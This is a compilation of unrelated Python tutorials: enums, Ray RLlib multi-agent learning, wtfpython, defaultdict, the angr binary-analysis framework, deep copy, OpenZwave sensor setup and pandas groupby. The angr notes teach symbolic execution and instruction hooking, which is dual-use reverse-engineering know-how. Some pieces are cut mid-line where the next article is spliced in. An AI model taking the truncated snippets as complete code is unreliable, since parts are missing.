print(Color.red)                # Color.red
print(Color.blue)               # Color.red
print(Color.red is Color.blue)  # True
print(Color(1))                 # Color.red -- lookup by value returns the first member

To forbid duplicate member values, apply the unique decorator:

from enum import Enum, unique

@unique
class Color(Enum):
    red = 1
    green = 2
    blue = 1  # ValueError: duplicate values found in <enum 'Color'>: blue -> red

Accessing members

Members can be retrieved by name or by value:

print(Color['red'])  # Color.red -- lookup by member name
print(Color(1))      # Color.red -- lookup by member value

Each member has a name attribute and a value attribute:

member = Color.red
print(member.name)   # red
print(member.value)  # 1

Iterating over the members is supported, in definition order; if some members share a value, only the first member with that value is yielded:

for color in Color:
    print(color)

The special attribute __members__ is an ordered dictionary mapping names to members; it can also be used to iterate:

for color in Color.__members__.items():
    print(color)  # ('red', <Color.red: 1>)

Comparing enums

Members can be compared by identity with is or by equality with ==:

Color.red is Color.red
Color.red is not Color.blue
Color.blue == Color.red
Color.blue != Color.red

Enum members do not support ordering comparisons:

Color.red < Color.blue  # TypeError: unorderable types: Color() < Color()

The IntEnum extension

IntEnum extends Enum; integer enums of different types can be compared with each other (and with integers):

from enum import IntEnum

class Shape(IntEnum):
    circle = 1
    square = 2

class Request(IntEnum):
    post = 1
    get = 2

print(Shape.circle == 1)             # True
print(Shape.circle < 3)              # True
print(Shape.circle == Request.post)  # True
print(Shape.circle >= Request.post)  # True


Berkeley's Open-Source RLlib Now Supports Large-Scale Multi-Agent Reinforcement Learning


AI Frontline note: Recently, the RISELab team at UC Berkeley added support for multi-agent reinforcement learning to its GitHub project Ray RLlib 0.6.0. This article was first published by team member Eric Liang on the RISELab blog and is translated and edited by AI Frontline. It is a concise tutorial on multi-agent reinforcement learning and on how it is designed into RLlib.

Why use multi-agent reinforcement learning?

Researchers find that for many practical reinforcement learning settings it is worth asking whether learning with multiple agents makes sense. In a given environment, a multi-agent approach can offer the following advantages over training a single policy:

A more interpretable decomposition of the problem. For example, suppose we need to train policies for cellular antenna tilt control in an urban environment. One option is to train a single "super-agent" that controls every antenna in the city; another is to model each antenna as a separate agent, which is clearly more sensible: only neighbouring antennas and the antennas observed by users need to interact with each other, and no complex response mechanism is needed between the other entities.

Potential for scalability. First, decomposing one huge, complex agent into several simple agents not only reduces the input and output dimensionality, it also effectively increases the amount of training data generated per iteration. Second, partitioning the action and observation spaces per agent plays a role similar to temporal abstraction, which has been shown to improve learning efficiency in the single-agent setting; analogous hierarchical approaches can be implemented explicitly as multi-agent systems. Finally, a good decomposition can be more robust to environment changes; a single super-agent, for instance, can easily overfit to one specific environment.

[Image: Figure 1: single-agent approaches (a) and (b) versus multi-agent reinforcement learning (c)]

Some examples of multi-agent applications:

Reducing traffic congestion: It turns out that intelligently controlling the speed of just a few autonomous vehicles can substantially increase traffic flow. Multi-agent modeling is the basis for such automation strategies, because in mixed-autonomy systems it is unrealistic to model the traffic lights and vehicles as one single agent: that would require synchronizing all observations and actions across every agent over a wide area.

[Image: Figure 2: traffic flow simulation, without autonomous vehicles (top) and with them (bottom)]

Antenna tilt control: The joint configuration of cellular base stations can be optimized according to the local user distribution and topology. Each base station can be modeled as one of many agents covering a city.

[Image: Figure 3: an antenna tilt control system]

OpenAI Five: Dota 2 AI agents are trained to coordinate with each other and to play against humans. Each of the five AI players is implemented as a separate neural-network policy and trained together with large-scale PPO.

[Image: Figure 4: computer players in a Dota 2 match]

Introducing multi-agent support in RLlib

This section introduces the general multi-agent support in RLlib, including compatibility with most of RLlib's distributed algorithms (A2C/A3C, PPO, IMPALA, DQN, DDPG and Ape-X). It also discusses the challenges of multi-agent reinforcement learning, shows how to train multi-agent policies with existing algorithms, and covers implementations of specialized algorithms for non-stationary environments and environments with high variability.

Since there are currently almost no multi-agent reinforcement learning libraries to choose from, the cost of experimenting with multi-agent approaches is high. In both research and applications, RLlib aims to reduce the friction of moving from single-agent to multi-agent mode and to simplify the transition.

Why supporting multi-agent is hard

Developing software for a fast-moving field like reinforcement learning is extremely challenging, and multi-agent reinforcement learning even more so. The main difficulty lies in the techniques needed to handle the core problems that arise in multi-agent learning.

An example: non-stationary environments. In the figure below, the red agent's goal is to learn how to regulate the speed of the overall traffic flow, while the blue agent only learns to minimize its own travel time. The red agent can achieve its goal simply by driving at the desired speed. In a multi-agent environment, however, the other agents also learn how to reach their own goals: the blue agent, for example, learns to cut its travel time by taking a detour. This is problematic because, from a single-agent perspective (e.g. the red agent's), the blue agent is "part of the environment". From that perspective, the environment's dynamics change over time, violating the Markov assumption on which Q-learning algorithms such as DQN are built.

[Image: Figure 5: a non-stationary environment: at first (a), the red agent controls the speed of the whole traffic flow by slowing down; then the blue agent learns to bypass the red agent (b), and the red agent's learned behaviour no longer handles the environment effectively]

Many algorithms have been proposed for this situation, e.g. LOLA, RIAL and Q-MIX. At a high level, these algorithms take the actions of the other agents into account during training; usually training is partially centralized while execution is decentralized. In implementation terms, this means the policy networks depend on each other, e.g. the network mixing in the Q-MIX algorithm:

[Image: Figure 6: the Q-MIX mixing network architecture; see QMIX: Monotonic Value Function Factorisation for Deep Multi-Agent Reinforcement Learning. Individual Q-estimates are aggregated by a monotonic mixing network for efficient computation of the final actions]

Similarly, policy-gradient algorithms such as A3C and PPO may fail to cope with multi-agent configurations, because credit assignment becomes harder and harder as the number of agents grows. Consider the multi-agent situation in the figure below: as the number of agents increases, an agent's reward becomes less and less correlated with its own actions. The traffic speed has dropped to 0, yet the agents cannot respond correctly to break the deadlock.

[Image: Figure 7: advantage estimation in complex situations: in the traffic jam above it is hard to judge which agent caused the jam, and once the jam clears it is equally unclear which agent should be assigned more credit]

One class of methods models the influence of the other agents on the environment through a centralized value function (the "Q" box in Figure 8); MA-DDPG uses this approach. Intuitively, conditioning on the other agents' actions effectively reduces the variance of each agent's advantage estimates.

[Image: Figure 8: the MA-DDPG framework, from Multi-Agent Actor-Critic for Mixed Cooperative-Competitive Environments. Only local information is used at execution time, while global information is used for optimization during training]

We have now covered the two main challenges of multi-agent reinforcement learning and their mitigation strategies. In many cases, training multi-agent policies with single-agent reinforcement learning algorithms already yields good results. OpenAI Five, for example, combines large-scale PPO with a specialized network model.

Training multi-agent policies in RLlib

So, in a multi-agent setting, how do we use specialized algorithms alongside single-agent reinforcement learning? RLlib designed a simple, practical approach for this. The details:

Policies are represented as objects: all gradient-based algorithms in RLlib declare a policy graph object containing a policy model πθ(ot), a trajectory post-processing function postθ(traj), and a policy loss L(θ; X). The policy graph object gives the distributed framework enough functionality to run environment rollouts (by querying πθ), collate experiences (by applying postθ), and optimize the policy (by minimizing the policy loss).

Policy objects are black boxes: to support multi-agent configurations, RLlib merely manages the creation and execution of multiple policy graphs per environment and accumulates their losses during policy optimization. Policy graph objects are treated as black boxes in RLlib, which means they can be implemented in any framework (including TensorFlow and PyTorch). Moreover, policy graphs can internally share variables and layers to implement algorithms such as Q-MIX and MA-DDPG, with no special framework support required.

To make these principles concrete, the next few sections walk through code examples of RLlib's multi-agent APIs for running large-scale multi-agent training.

The multi-agent environment model

Since there is no settled standard for a multi-agent environment interface, RISELab wrote this multi-agent environment model as a direct extension of the Gym interface. In a multi-agent environment, multiple acting entities can step at each turn. As an example, consider a traffic control scenario in which multiple controllable entities (e.g. traffic lights, autonomous vehicles) work together to reduce highway congestion.

In this scenario:

Each agent can respond on a different time scale (i.e., act asynchronously).
Agents enter and leave the environment over time.

[Image: Figure 9: RLlib multi-agent environments can model multiple independent agents entering and leaving the environment over time; different agents can be assigned different policies]

The snippet below uses the MultiAgentEnv interface, which returns observations and rewards from multiple ready agents:

# Example: using a multi-agent environment
> env = MultiAgentTrafficEnv(num_cars=20, num_traffic_lights=5)

# Observations are dicts; not every agent needs to be present
# in the dict at every timestep.
> print(env.reset())
{
    "car_1": [[...]],
    "car_2": [[...]],
    "traffic_light_1": [[...]],
}

# Each agent that supplies an action gets its results back
> new_obs, rewards, dones, infos = env.step(actions={"car_1": ..., "car_2": ...})

# Likewise, the new observations, rewards, dones, infos and so on are dicts
> print(rewards)
{"car_1": 3, "car_2": -1, "traffic_light_1": 0}

# Individual agents can leave early; when "__al
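To train in such an environment, each agent id is mapped to a policy. Below is a rough sketch of what this configuration looked like around RLlib 0.6; the environment name, the placeholder spaces and the policy names are illustrative assumptions, not code from the article:

import ray
from ray import tune
from gym.spaces import Box, Discrete

ray.init()

# Placeholder observation/action spaces (assumptions for illustration)
car_obs_space = Box(-1.0, 1.0, (4,))
car_act_space = Discrete(5)
light_obs_space = Box(-1.0, 1.0, (2,))
light_act_space = Discrete(2)

tune.run_experiments({
    "multiagent_demo": {
        "run": "PPO",
        "env": "my_multiagent_traffic_env",  # assumed to be registered beforehand
        "config": {
            "multiagent": {
                # One shared policy for cars, one for traffic lights; None means
                # "use the algorithm's default policy graph class".
                "policy_graphs": {
                    "car_policy": (None, car_obs_space, car_act_space, {}),
                    "light_policy": (None, light_obs_space, light_act_space, {}),
                },
                # Route each agent id to one of the policies above
                "policy_mapping_fn": tune.function(
                    lambda agent_id: "car_policy" if agent_id.startswith("car")
                    else "light_policy"),
            },
        },
    },
})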

This Python Resource Has Over 8,000 GitHub Stars, and Now It Has Been Translated into Chinese


Recently, a Python project on GitHub was completed.

A contributor going by the name 暮晨 has translated a very interesting Python project into Chinese.

The project is "What the f*ck Python!", dedicated to the strange and surprising corners of the Python language.

About the project

The main body of the project consists of examples, divided into 5 parts:

Strain your brain!

Appearances are deceptive!

Watch out for the landmines!

The Hidden treasures!

Miscellaneous

In total there are 51 examples.

Every example follows the same structure. Take "Mutating the immutable!" as an example:

First, the code is given:

some_tuple = ("A", "tuple", "with", "values")
another_tuple = ([1, 2], [3, 4], [5, 6])

Then the output (for a given Python version):

>>> some_tuple[2] = "change this"
TypeError: 'tuple' object does not support item assignment
>>> another_tuple[2].append(1000)  # no error here
>>> another_tuple
([1, 2], [3, 4], [5, 6, 1000])
>>> another_tuple[2] += [99, 999]
TypeError: 'tuple' object does not support item assignment
>>> another_tuple
([1, 2], [3, 4], [5, 6, 1000, 99, 999])

Then comes a short description of the unexpected output; for this example:

And I thought tuples were immutable...

Next comes the explanation, briefly describing what happened and why, with further examples where necessary.

For this example it reads:

Quoting https://docs.python.org/2/reference/datamodel.html

Immutable sequences: an object of an immutable sequence type cannot change once it is created. (If the object contains references to other objects, those other objects may be mutable and may be modified; however, the collection of objects directly referenced by an immutable object cannot change.)

The += operator modifies the list in place. The item assignment doesn't work, but when the exception is raised, the item has already been modified in place.

In some places the translator also adds notes of his own; for this example:

For immutable objects (here the tuple), += is not an atomic operation but an extend followed by an assignment (=); the assignment raises the exception, but the extend has already succeeded.
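A minimal sketch of that note in action:

t = ([1, 2],)
try:
    t[0] += [3]    # the in-place extend succeeds, then the tuple assignment raises
except TypeError as e:
    print(e)       # 'tuple' object does not support item assignment
print(t)           # ([1, 2, 3],) -- the inner list was mutated anyway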

There are 50 more examples waiting for you.

How do you use it?

Of course, you should learn how to use this resource. In the usage section, the contributor recommends reading the examples in order.

Then, while reading each example:

Carefully read the setup code at the beginning of the example.
Read the output.
Check whether the result matches your expectation.
Make sure you know the underlying reason.
If you don't, take a deep breath and read the explanation (and if you still don't get it, don't stay silent! Open an issue).
If you do, give yourself a small reward and move on to the next example.

In addition, you can read WTFPython from the command line: there is a pypi package and an npm package (the latter supports code highlighting), though both are English-only.

About the author

The original author of the project is an Indian developer named Satwik Kansal.

His GitHub profile describes him as a veteran in deep learning and decentralized applications.

The English version currently stands at 8.3k stars.

Links

Chinese version:

https://github.com/leisurelicht/wtfpython-cn

English original:

https://github.com/satwikkansal/wtfpython

List of three tuples to a dictionary from the list of lists


I need the first item in each tuple to be the key that returns a list of lists of the corresponding items. For example...

This is my input data:

my_problem = [(1,20,400), (1,30,450), (2,40,525), (2,50,600), (2,70,680),(3,80,700), (3,90,980)]

This is what I'm trying to achieve:

my_solution = {'1': [[20,400],[30,450]], '2': [[40,525],[50,600],[70,680]], '3': [[80,700], [90,980]]}

My actual list has thousands of these tuples of varying lengths.

Use a defaultdict. These nice structures are essentially dictionaries that supply a default value when a missing key is accessed:

from collections import defaultdict

solution = defaultdict(list)  # create defaultdict with default value []
for item in my_problem:
    solution[item[0]].append(list(item[1:]))

and to convert back to a dictionary (although this is unnecessary, as a defaultdict already has the behaviour of a regular dictionary) you can do

my_solution = dict(solution)

A Slightly Neater Formulation in Python 3

(kudos to tobias_k for pointing this out)

In Python 3, you can replace the ugly item[0], etc. calls with tuple unpacking:

solution = defaultdict(list)
for first, *rest in my_problem:
    solution[first].append(rest)

angr Study Notes

Preface

angr is a binary analysis framework based on symbolic and simulated execution. It can be used in many scenarios, such as reverse engineering and vulnerability discovery. This article is a summary of my study of it.

Installation

This section covers installation on Ubuntu; for other platforms see the official documentation.

First install some dependency packages:

sudo apt-get install python-dev libffi-dev build-essential virtualenvwrapper

Then run:

mkvirtualenv angr && pip install angr

and the installation is done.

It is recommended to install inside a virtualenv, because some of the libraries angr uses differ from the normal versions; installing directly with pip may fail.

Common angr objects and basic usage

The rough steps for using angr (a minimal end-to-end sketch follows this list):

Create a project

Set up a state

Create symbolic values: BVS (bitvector symbolic) or BVV (bitvector value)

Place the symbolic values into memory or wherever else they are needed

Set up a Simulation Manager, the object that performs path exploration

Run, exploring for paths that satisfy the requirements

Solve the constraints to obtain concrete results
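A minimal end-to-end sketch of that workflow; the binary name and all addresses below are hypothetical placeholders:

import angr
import claripy

# Load the binary (the path is a placeholder)
proj = angr.Project('./target', load_options={"auto_load_libs": False})

# Start from an assumed address and plant a 32-bit symbolic value at a global
state = proj.factory.blank_state(addr=0x400000)
sym = claripy.BVS("sym", 32)
state.memory.store(0x601000, sym)

# Explore towards a target block while avoiding a failure block (addresses assumed)
simgr = proj.factory.simgr(state)
simgr.explore(find=0x400123, avoid=0x400456)

# Solve the constraints for a concrete value that reaches the target
if simgr.found:
    print(simgr.found[0].solver.eval(sym))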

The Project object: introduction and basic usage

Load a binary with the angr.Project function. Its first argument is the path of the file to load; there are many optional arguments after that, see the official documentation.

p = angr.Project('./issue', load_options={"auto_load_libs": False})

auto_load_libs controls whether dependent libraries are loaded automatically. If set to True, the dependencies are loaded and the analysis also steps into library functions when they are called, which increases the analysis workload and may even make it hang.

After loading the file, the project object exposes information and drives the subsequent operations:

In [11]: proj = angr.Project('/bin/true')
In [12]: proj.loader.shared_objects
Out[12]: OrderedDict([('true', <ELFObject true, maps [0x400000:0x6063bf]>), (u'libc.so.6', <ELFObject libc-2.23.so, maps [0x1000000:0x13c999f]>), (u'ld-linux-x86-64.so.2', <ELFObject ld-2.23.so, maps [0x2000000:0x2227167]>)])
In [13]: proj = angr.Project('/bin/true', load_options={"auto_load_libs": False})
In [14]: proj.loader.shared_objects
Out[14]: OrderedDict([('true', <ELFObject true, maps [0x400000:0x6063bf]>)])
In [15]:

You can see that with {"auto_load_libs": False} some dynamic libraries are not loaded.

Two smaller points are worth knowing:

If auto_load_libs is True, calls to library functions go into the real library code; if some library function's logic is complex, the analysis may never come back. At the same time, angr implements many library functions in Python (stored in angr.SIM_PROCEDURES); by default these built-in versions replace the real calls, and only functions not on that list fall through to the real library.

If auto_load_libs is False, a call to a library function directly returns an unconstrained symbolic value.

hook

In angr we can use hooks to replace the binary code at a given address with Python code. While emulating the program, before executing each instruction angr checks whether the address has been hooked; if so, it does not execute that instruction and runs the Python handler registered for the hook instead.

Let's look at an example.

Target binary:

https://github.com/angr/angr-doc/tree/master/examples/sym-write

Example script:

#!/usr/bin/env python
# coding=utf-8
import angr
import claripy

def hook_demo(state):
    state.regs.eax = 0
    state.regs.ebx = 0xdeadbeef

p = angr.Project("./examples/sym-write/issue", load_options={"auto_load_libs": False})
p.hook(addr=0x08048485, hook=hook_demo, length=2)

state = p.factory.blank_state(addr=0x0804846B, add_options={"SYMBOLIC_WRITE_ADDRESSES"})
u = claripy.BVS("u", 8)
state.memory.store(0x0804A021, u)

sm = p.factory.simgr(state)
sm.explore(find=0x080484DB)

st = sm.found[0]
print hex(st.se.eval(st.regs.ebx))

The script's flow:

First, load the file with angr.Project, setting auto_load_libs to False so dependent libraries are not loaded.

Then use p.hook to hook the 2-byte instruction at 0x08048485 with hook_demo; afterwards, executing 0x08048485 runs hook_demo instead.

Then create a state. Since we want to write a symbolic value (BVS) into memory, set SYMBOLIC_WRITE_ADDRESSES.

Then create an 8-bit symbolic value and store it at 0x0804A021 (the location of the global variable u).

Then start exploring paths, and finally solve for the symbolic value that makes the program reach the "you win" block.

Here we focus on the p.hook call, which uses three arguments:

p.hook(addr=0x08048485, hook=hook_demo, length=2)

addr is the address of the instruction to hook.

hook is the handler; when execution reaches addr, this function runs and receives the current state object as its argument.

length is the length of the hooked instruction; after the handler runs, angr uses length to skip over the instruction and continue at the next one.

In the example above, the instruction at 0x08048485 is hooked.

It is an xor eax, eax instruction, 2 bytes long.

def hook_demo(state):
    state.regs.eax = 0
    state.regs.ebx = 0xdeadbeef

For demonstration, the handler sets eax to 0 (replicating the effect of xor eax, eax) and sets ebx to 0xdeadbeef. Since ebx is not used later, modifying it lets us check after path exploration whether the value matches expectations.

You can see that ebx has been changed to 0xdeadbeef.

The SimState object

This object holds the program's state at a given stage of execution.

Through it you can manipulate the context of that state, such as memory and registers.

Creating a state

In [8]: p = angr.Project("./hello_angr")
In [9]: st = p.factory.entry_state()
In [10]: st.regs.rsp
Out[10]: <BV64 0x7fffffffffeff98>
In [11]: st
Out[11]: <SimState @ 0x4004a0>
In [12]:

First load the binary to create a project object, then create an entry_state; through this state object you can read or modify the program's runtime state at that point.

entry_state: does some initialization and stops at the program's entry point.

Another commonly used one is:

st = p.factory.blank_state(addr=0x4004a0)

This creates a blank_state object in which many things are uninitialized; when the program accesses uninitialized data, an unconstrained symbolic value is returned.

Basic operations

A state object is generally created before symbolic execution starts, to initialize data for the subsequent run, such as the stack state and register values.

Or, after path exploration finishes, a state object is returned so the user can extract the values they need, or do constraint solving to recover the symbolic inputs that reach the target branch.

Accessing registers

Read and modify register values through the attributes of the state.regs object:

In [12]: state.regs.r<TAB>
state.regs.r10  state.regs.r14  state.regs.rax  state.regs.rdi  state.regs.rip
state.regs.r11  state.regs.r15  state.regs.rbp  state.regs.rdx  state.regs.rsi
state.regs.r12  state.regs.r8   state.regs.rbx  state.regs.register_default  state.regs.rsp
state.regs.r13  state.regs.r9   state.regs.rcx  state.regs.rflags

# get the value of rip
In [12]: state.regs.rip
Out[12]: <BV64 0x400470>

# get the value of rsp
In [13]: state.regs.rsp
Out[13]: <BV64 0x7fffffffffeff78>

# get the value of rbp
In [14]: state.regs.rbp
Out[14]: <BV64 reg_38_36_64{UNINITIALIZED}>

# set rbp = rsp + 0x40
In [15]: state.regs.rbp = state.regs.rsp + 0x40
In [16]: state.regs.rbp
Out[16]: <BV64 0x7fffffffffeffb8>

# both BVV and BVS need to go through the solver to obtain concrete values
In [26]: hex(state.se.eval(state.regs.rbp))
Out[26]: '0x7fffffffffeffb8L'
In [27]: hex(state.solver.eval(state.regs.rbp))
Out[27]: '0x7fffffffffeffb8L'

Accessing memory

There are two ways to access memory; one is through state.mem, using array-index-like access:

In [64]: state.mem[state.regs.rsp].qword
Out[64]: <uint64_t <BV64 0x2> at 0x7fffffffffeff78>
In [65]: state.mem[state.regs.rsp].qword = 0xdeadbeefdeadbeef
In [66]: state.mem[state.regs.rsp].qword
Out[66]: <uint64_t <BV64 0xdeadbeefdeadbeef> at 0x7fffffffffeff78>
In [67]: m = state.mem[state.regs.rsp]
In [68]: m.<TAB>
m.STRONGREF_STATE  m.double   m.int32_t  m.register_default  m.ssize    m.uint32_t  m.wstring
m.array            m.dword    m.int64_t  m.resolvable        m.ssize_t  m.uint64_t
m.byte             m.example  m.int8_t   m.resolved          m.state    m.uint8_t
m.char             m.float    m.long     m.set_state         m.store    m.ui

Python Extras: Deep Copy and Shallow Copy Explained


First, let me introduce two small pieces of knowledge that we will use below. One is the function id(), the other is the operator is. The id() function returns an object's memory address; is compares whether two variables reference the same object. Don't confuse it with ==, which compares whether two variables' values are equal.

>>> a = [1, 2, 3]
>>> b = [1, 2, 3]
>>> id(a)
38884552L
>>> a is b
False
>>> a == b
True

The word "copy" is rendered two ways in Chinese: the transliteration 拷贝 and the standard translation 复制; they mean the same thing.

On the surface, copying just means duplicating something, but in many programming languages, such as Python or C++, it is not that simple.

>>> a = 1
>>> b = a
>>> b
1

From the example above it looks as though we got two 1s, but if you have read my earlier articles you may remember one sentence: "variables have no type". In Python a variable is just a label. Time for id() to make its grand entrance and show where things live in memory.

>>> a = 1
>>> b = a
>>> b
1
>>> id(a)
31096808L
>>> id(b)
31096808L

See it? id(a) and id(b) are equal, so there are not two 1s, only one, with two labels named a and b stuck onto it. This is pervasive in Python: such assignment only "pretends" to copy; in reality we have two variables referencing the same object.

Now look at the copy() method:

>>> a = {'name': 'rocky', 'like': 'python'}
>>> b = a.copy()
>>> b
{'name': 'rocky', 'like': 'python'}
>>> id(a)
31036280L
>>> id(b)
38786728L

Sure enough, this time b is different from the original a: new memory was allocated. Now we can reason: although the two are equal, they live in different memory, so they should not interfere with each other; if we change b, a should not change.

>>> b['name'] = 'leey'
>>> b
{'name': 'leey', 'like': 'python'}
>>> a
{'name': 'rocky', 'like': 'python'}

The result matches our reasoning exactly. Once you understand that objects have types, variables don't, and that a variable is a label on an object, you can correctly predict the results Python gives you.

Let's look at the next example; please make sure you have understood everything above before reading on, otherwise you may get dizzy.

>>> a = {'name': 'rocky', 'like': 'python'}
>>> b = a
>>> b
{'name': 'rocky', 'like': 'python'}
>>> b['name'] = 'leey'
>>> b
{'name': 'leey', 'like': 'python'}
>>> a
{'name': 'leey', 'like': 'python'}

See what happened? Modifying the dict object through b also changed a. In other words, b = a results in two variables referencing the same object. But is it really that simple? Open your eyes wide; here comes the key part.

>>> first = {'name': 'rocky', 'lanaguage': ['python', 'c++', 'java']}
>>> second = first.copy()
>>> second
{'name': 'rocky', 'lanaguage': ['python', 'c++', 'java']}
>>> id(first)
31036280L
>>> id(second)
38786728L

So far no problem; as we said before, second is copied from first and they reference two different objects.

>>> second['lanaguage'].remove('java')
>>> second
{'name': 'rocky', 'lanaguage': ['python', 'c++']}
>>> first
{'name': 'rocky', 'lanaguage': ['python', 'c++']}

Notice anything? second's 'lanaguage' value is a list; deleting a value from that list should only change second, so why did first change as well? Weren't they supposed to leave each other alone? Surprised? Was what we said before wrong? Let's try another key:

>>> second['name'] = 'leey'
>>> second
{'name': 'leey', 'lanaguage': ['python', 'c++']}
>>> first
{'name': 'rocky', 'lanaguage': ['python', 'c++']}

The principle described earlier still works here, so what on earth is going on? Time for id() to shine once more.

>>> id(first['name'])
38829152L
>>> id(second['name'])
38817544L
>>> id(first['lanaguage'])
38754120L
>>> id(second['lanaguage'])
38754120L

The deep reason has to do with how Python stores data, which I won't go into here (truth be told, I don't fully understand it either). What we need to know is that when copy() runs, compound objects such as lists (built from strings, numbers, etc.) are still copied by reference, i.e. another label is stuck on and no new object is built. This kind of copy is called a shallow copy (at last, the concept arrives!). The implication is that it does not solve the deeper problem; the further implication is that there is a method that does.

Indeed, Python also has a deep copy (deepcopy); before using it you must import the copy module. Let's try it:

>>> import copy
>>> first = {'name': 'rocky', 'lanaguage': ['python', 'c++', 'java']}
>>> second = copy.deepcopy(first)
>>> second
{'name': 'rocky', 'lanaguage': ['python', 'c++', 'java']}
>>> second['lanaguage'].remove('java')
>>> second
{'name': 'rocky', 'lanaguage': ['python', 'c++']}
>>> first
{'name': 'rocky', 'lanaguage': ['python', 'c++', 'java']}

With deep copy, the nested list really is no longer shared.

Z-Wave : Lessons Learned Python OpenZwave


This article explains a few missing pieces of the puzzle I had when setting up a home automation network using ZWave. Most of this information is available publicly but it took a while to find or to actually make the connection between what I wanted and what I needed to look for in the documentation.

Initial Setup

Hardware:

Raspberry Pi with Aeotec ZWave Stick Gen5 ( https://aeotec.com/z-wave-usb-stick )
Fibaro Motion Sensor ( https://www.fibaro.com/en/products/motion-sensor/ )

Software:

Mozilla Things Gateway ( https://iot.mozilla.org/gateway/ )

Though relatively new, Things Gateway was impressive: easy to set up, automatic discovery, worked with all my devices, and very extensible.

Digging deeper…

While the documented setup for Things Gateway got me up and running quickly, there were a few things I wanted to fix, mainly the reporting interval of the sensor (read on for why I wanted to change this). Getting there was an interesting journey, since the Things Gateway doesn't seem to have a UI that caters for this (yet).

Enter OpenZwave

The Things Gateway backend uses the OpenZwave project, which comes with handy libraries. The one I used was Python OpenZwave. After installing this on the RPi, I attempted to run one of the examples, api_demo.py, and ran into my first couple of newbie mistakes:

Lesson 1: The Aeotec USB stick emulates a serial device, which means only one process can use it at a time. You have to disable the Things Gateway ZWave adapter before Python OpenZWave can use the stick.

Lesson 2: If some of your ZWave devices are “asleep”, your network will never go into “ready” state. Make sure all your ZWave devices are awake.

The second lesson bears some expanding, especially for newbies like me. Most battery-powered ZWave devices go into "sleep mode" for extended periods of time to extend battery life, during which they do not respond to active polls. Instead, depending on the type of device, they send events (like motion detection) or reports (like sensor values) at periodic intervals. In addition, when asleep the devices will not respond to negotiation requests from your ZWave controller. The longer these sleep periods, the better for battery life, at the cost of accuracy of course. Samsung SmartThings has some good documentation expanding on this: https://docs.smartthings.com/en/latest/device-type-developers-guide/z-wave-primer.html

So you may end up in situations like:

The UI of your gateway never seems to refresh its values; this is what initially made me want to change the reporting intervals.
When running the Python api_demo.py example, network.STATE_READY was never attained, so I got unexpected results. I had to manually wake up the Fibaro Motion Sensor (by tapping its action button once).

Once past these details, the api_demo.py script should return a whole lot of information about your network and its nodes.


Advanced Configuration

Changing the sensor configuration is a bit more complicated; we need to interact directly with the ZWave device. Open a Python shell and copy/paste something like the following.
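A minimal bring-up sketch, adapted from the python-openzwave examples; the device path /dev/ttyACM0 and the config path are assumptions that may differ on your system:

from openzwave.option import ZWaveOption
from openzwave.network import ZWaveNetwork
import time

# Point at the Aeotec stick and the OpenZwave config directory
options = ZWaveOption("/dev/ttyACM0", config_path="/usr/etc/openzwave")
options.set_console_output(False)
options.lock()

network = ZWaveNetwork(options)

# Wait until the network is ready (all nodes awake; see Lesson 2)
while network.state < network.STATE_READY:
    time.sleep(1)
print("Network ready, %d nodes" % network.nodes_count)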

Most of the above is a modified version from the python-openzwave examples folder

At this stage, the network object will allow you to interact with your network. First step, identify the node you’d like to communicate with:

>> network.nodes
{1: <openzwave.node.ZWaveNode object at 0x76c659d0>, 6: <openzwave.node.ZWaveNode object at 0x764fc610>}
>> network.nodes[6].manufacturer_name
'FIBARO System'

So node number 6 is what I’m after. Now to get to the configuration values. Looking at the documentation for the Fibaro device shows the different configuration parameters:

https://manuals.fibaro.com/content/manuals/en/FGMS-001/FGMS-001-EN-T-v2.1.pdf
https://products.z-wavealliance.org/products/2762/configs

So, for example, I'd like to change parameter number "64". But:

>> network.nodes[6].get_configs()
{}

An empty result. It seems I'm not the only one to get to this point, but the devs say it's expected… This gave a clue:

>> network.nodes[6].product_name
Unknown: type=0801, id=1002

It turns out that the ZWave protocol on its own does not let you "auto-discover" the configuration options available on a device. OpenZwave needs to know which device it's talking to in order to know which configuration options that device supports, and it figures that out from the "type" and "id" numbers above.

Lesson 3: If you see an "Unknown" node product name like in the above example, the type and id numbers don't match anything OpenZwave has in its database, and you need to add the device manually. Read https://github.com/OpenZWave/open-zwave/wiki/Adding-Devices

Configuring OpenZwave

After going through the above link, the first stop is to check the manufacturer_specific.xml file under /usr/etc/openzwave for our product type and id. In my case Fibaro seems to have updated their product but OpenZwave hasn't yet caught up. There was an entry in the XML file that was very close to what I was looking for:

<Product type="0801" id="1001" name="FGMS001-ZW5 Motion Sensor" config="fibaro/fgmszw5.xml"/>

Double-check the fgmszw5.xml file; in my case it matched the documentation, and I was able to simply add a new line to manufacturer_specific.xml with the correct type and id I required:

<Product type="0801" id="1002" name="FGMS001-ZW5 Motion Sensor" config="fibaro/fgmszw5.xml"/>

I restarted my interactive Python script, ran network.nodes[6].get_configs()… and got an empty dictionary again.

Lesson 4: Remove any zwcfg_*.xml files you have, otherwise OpenZwave will keep using its cached node information instead of re-reading the updated configuration.
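For completeness, once OpenZwave recognizes the device, a configuration parameter can be read and written roughly like this; a sketch assuming node 6 is the (awake) Fibaro sensor and that parameter 64 and a 2-byte size match your device's manual:

node = network.nodes[6]

# Ask the device to report parameter 64, then list the known configs
node.request_config_param(64)
print(node.get_configs())

# Write a new value to parameter 64 (size in bytes per the manual)
node.set_config_param(64, 600, size=2)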

Python Pandas Groupby Tutorial


In this Pandas groupby tutorial we are going to learn how to organize Pandas dataframes by groups. More specifically, we are going to learn how to group by one and multiple columns. Furthermore, we are going to learn how to calculate some basic summary statistics (e.g., mean, median), convert a Pandas groupby object to a dataframe, calculate the percentage of observations in each group, and many more useful things.

More about working with Pandas: Pandas Dataframe Tutorial

First of all we are going to import Pandas as pd and read a CSV file into a dataframe using the read_csv method. In the example below we use index_col=0 because the first column in the dataset is the index column.

import pandas as pd

data_url = 'http://vincentarelbundock.github.io/Rdatasets/csv/carData/Salaries.csv'
df = pd.read_csv(data_url, index_col=0)
df.head()

We used Pandas head to see the first 5 rows of our dataframe. In the image above we can see that we have at least three variables that we can group our data by: "rank", "discipline", and "sex". Of course, we could also group by yrs.since.phd or yrs.service, but that may give a lot of groups. As previously mentioned, we are going to use Pandas groupby to group a dataframe based on one, two, three, or more columns.

Data can be loaded from other file formats as well (e.g., Excel, HTML, JSON):

Pandas Excel Tutorial: How to Read and Write Excel Files
Explorative Data Analysis with Pandas, SciPy, and Seaborn (includes a short introduction to Pandas read_html)

Python Pandas Groupby Example

We are starting with the simplest example: grouping by one column. In the Pandas groupby example below we are going to group by the column "rank".

There are many different methods that we can use on Pandas groupby objects (and Pandas dataframe objects). All available methods on a Python object can be found using this code:

import IPython

# Grouping by one factor
df_rank = df.groupby('rank')

